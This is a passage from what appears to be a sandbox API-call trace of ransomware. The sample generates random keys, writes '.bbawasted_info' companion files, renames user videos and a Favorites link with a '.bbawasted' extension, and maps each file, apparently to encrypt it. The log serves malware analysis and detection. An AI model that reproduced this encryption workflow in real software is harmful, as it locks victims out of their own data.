phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.049] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.049] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\sTBADe.avi") returned 72 [0077.049] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29a) returned 0x5ddab8 [0077.049] lstrcpyW (in: lpString1=0x5ddb48, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.049] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0077.049] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.050] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0077.050] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.050] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\sTBADe.avi.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\stbade.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.079] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.080] SetEndOfFile (hFile=0x11c) returned 1 [0077.254] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.254] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.254] lstrcpyW (in: lpString1=0x5ddb48, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\sTBADe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\stbade.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\sTBADe.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\stbade.avi.bbawasted")) returned 1 [0077.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\sTBADe.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\stbade.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.255] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.255] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.256] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5ddda8 | out: pbBuffer=0x5ddda8) returned 1 [0077.256] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.256] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.257] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.257] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.265] SetEndOfFile (hFile=0x11c) returned 1 [0077.267] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.267] CloseHandle (hObject=0x11c) returned 1 [0077.268] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ddab8 | out: hHeap=0x580000) returned 1 [0077.268] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.271] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.271] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.271] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\YKuQNz.mkv") returned 72 [0077.271] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29a) returned 0x5ddab8 [0077.271] lstrcpyW (in: lpString1=0x5ddb48, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.271] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0077.271] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.272] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0077.272] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\YKuQNz.mkv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ykuqnz.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.273] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.273] SetEndOfFile (hFile=0x11c) returned 1 [0077.274] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.274] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.274] lstrcpyW (in: lpString1=0x5ddb48, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\YKuQNz.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ykuqnz.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\YKuQNz.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ykuqnz.mkv.bbawasted")) returned 1 [0077.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\YKuQNz.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ykuqnz.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.275] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0077.275] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.276] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5ddda8 | out: pbBuffer=0x5ddda8) returned 1 [0077.276] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.276] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.277] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.277] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.285] SetEndOfFile (hFile=0x11c) returned 1 [0077.287] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.287] CloseHandle (hObject=0x11c) returned 1 [0077.289] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ddab8 | out: hHeap=0x580000) returned 1 [0077.289] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.289] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.289] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.289] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\_ TeDgTJkldz5.avi") returned 79 [0077.290] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a8) returned 0x5ddab8 [0077.290] lstrcpyW (in: lpString1=0x5ddb56, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.290] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0077.290] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.290] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0077.290] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\_ TeDgTJkldz5.avi.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\_ tedgtjkldz5.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.291] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.292] SetEndOfFile (hFile=0x11c) returned 1 [0077.292] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.292] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.292] lstrcpyW (in: lpString1=0x5ddb56, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\_ TeDgTJkldz5.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\_ tedgtjkldz5.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\_ TeDgTJkldz5.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\_ tedgtjkldz5.avi.bbawasted")) returned 1 [0077.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\_ TeDgTJkldz5.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\_ tedgtjkldz5.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.295] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.297] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.298] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dddb0 | out: pbBuffer=0x5dddb0) returned 1 [0077.298] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.298] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.298] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.298] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.313] SetEndOfFile (hFile=0x11c) returned 1 [0077.315] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.315] CloseHandle (hObject=0x11c) returned 1 [0077.316] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ddab8 | out: hHeap=0x580000) returned 1 [0077.316] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.317] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.317] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.317] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Wp_sIOiMgKB1TZoJxn.avi") returned 63 [0077.317] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x288) returned 0x5abe80 [0077.317] lstrcpyW (in: lpString1=0x5abefe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.317] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0077.317] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.318] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0077.318] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Wp_sIOiMgKB1TZoJxn.avi.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wp_sioimgkb1tzojxn.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.319] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.320] SetEndOfFile (hFile=0x11c) returned 1 [0077.320] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.321] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.321] lstrcpyW (in: lpString1=0x5abefe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Wp_sIOiMgKB1TZoJxn.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wp_sioimgkb1tzojxn.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Wp_sIOiMgKB1TZoJxn.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wp_sioimgkb1tzojxn.avi.bbawasted")) returned 1 [0077.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Wp_sIOiMgKB1TZoJxn.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wp_sioimgkb1tzojxn.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.322] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.325] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.325] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0077.325] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.326] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.326] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.326] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.335] SetEndOfFile (hFile=0x11c) returned 1 [0077.337] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.337] CloseHandle (hObject=0x11c) returned 1 [0077.339] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abe80 | out: hHeap=0x580000) returned 1 [0077.339] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.339] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.340] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.340] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XAXO.flv") returned 49 [0077.340] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26c) returned 0x5bf070 [0077.340] lstrcpyW (in: lpString1=0x5bf0d2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.340] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0077.340] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.340] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0077.340] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XAXO.flv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xaxo.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.341] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.342] SetEndOfFile (hFile=0x11c) returned 1 [0077.342] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.342] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.342] lstrcpyW (in: lpString1=0x5bf0d2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.342] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XAXO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xaxo.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XAXO.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xaxo.flv.bbawasted")) returned 1 [0077.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XAXO.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xaxo.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.343] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0077.345] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.346] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0077.346] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.346] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.347] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.347] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.380] SetEndOfFile (hFile=0x11c) returned 1 [0077.382] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.382] CloseHandle (hObject=0x11c) returned 1 [0077.383] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.384] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.384] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.384] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.384] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0077.384] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27e) returned 0x5bf070 [0077.385] lstrcpyW (in: lpString1=0x5bf0e4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.385] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.385] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.385] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.385] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.386] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.387] SetEndOfFile (hFile=0x11c) returned 1 [0077.387] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.387] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.387] lstrcpyW (in: lpString1=0x5bf0e4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.bbawasted")) returned 1 [0077.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.388] CreateFileMappingW (hFile=0xfc, 